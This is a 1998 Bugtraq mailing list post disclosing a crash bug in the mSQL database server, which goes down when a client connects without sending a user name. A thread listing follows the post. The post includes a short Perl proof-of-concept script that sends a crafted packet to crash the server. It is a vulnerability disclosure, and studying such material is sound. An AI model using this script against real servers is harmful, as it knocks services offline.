Bugtraq mailing list archives
mSQL dummies
From: boutzev () usa net (Peter Boutzev)
Date: Wed, 11 Nov 1998 19:09:27 +0100
Hello to everyone, That is: in function "msqlConnect()" , libmsql checks the user name of the logged user. Ok, let's try to connect to an mSQL server without sending it. I thought that my prog did not work, because it was unable to connect the mSQL server. After several retries, I understood that the server was gone away. I restarted it, and made a new connection. Here is what happens: --------------- Hit by a sig 11 Forced server shutdown due to bad signal! IOT trap/Abort ------------- I discovered this where I was doing an mSQL Clinent with an old libmsql.dll under Windows. I have no time to look further on the problem, and I am useing mySQL now. Anyway here is a small cut of code that demonstrates the problem. ------------------------- CUT HERE -------------------------- #!/usr/bin/perl use IO::Socket; $host = @ARGV[0]; $port = @ARGV[1]; &Connect; sub Connect { $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "msql($port)", ) or die "Cannot connect !"; $sock->autoflush(1); print $sock "\x05\x00\x00\x00\x00\x0A\x03\x31\x3A\x0A"; while (<$sock>) { print; } printf "Y0!-y0-Y0!\n"; } ------------------------------ END --------------------------- I don't know was this discussed here before, ot not, I informed Hughes Technologies 5 months ago, and they did not respond me. Maybe in the new mSQL 2.0.5 or later the bug was patched, I have no time to test it. 2.0.3 and 2.0.4 seem to be vulnerable. I am not sure about gaining remote access with this. Anyway, I thought that it should be posted here...
Current thread:
- Re: [Linux] klogd 1.3-22 buffer overflow, (continued)
- Re: [Linux] klogd 1.3-22 buffer overflow Martin Schulze (Nov 17)
- Re: [Linux] klogd 1.3-22 buffer overflow Michal Zalewski (Sep 12)
- Re: [Linux] klogd 1.3-22 buffer overflow security () PENGUIN NET AU (Nov 17)
- Update to Microsoft Security Bulletin (MS98-015) Aleph One (Nov 18)
- Multiple KDE security vulnerabilities (root compromise) David G. Andersen (Nov 18)
- Sun Security Bulletin #00179 Aleph One (Nov 18)
- Re: Sun Security Bulletin #00179 Jonathan A. Zdziarski (Nov 19)
- Re: [Linux] klogd 1.3-22 buffer overflow Martin Schulze (Nov 17)
- Re: WWWBoard Vulnerability Spartak Radchenko (Nov 10)
- Re: WWWBoard Vulnerability Samuel Sparling (Nov 10)
- world-readable shadow backups in SuSe 5.2 HD Moore (Nov 10)
- mSQL dummies Peter Boutzev (Nov 11)
- Re: world-readable shadow backups in SuSe 5.2 Erik (Nov 11)
- Bootpd 2.4.3 tmp race Marcelo Tosatti (Nov 12)
- Re: world-readable shadow backups in SuSe 5.2 Roman Drahtmueller (Nov 12)
- More msql... Peter Boutzev (Nov 12)
- Re: world-readable shadow backups in SuSe 5.2 Andrew Pitman (Nov 11)
- Re: world-readable shadow backups in SuSe 5.2 xnec (Nov 11)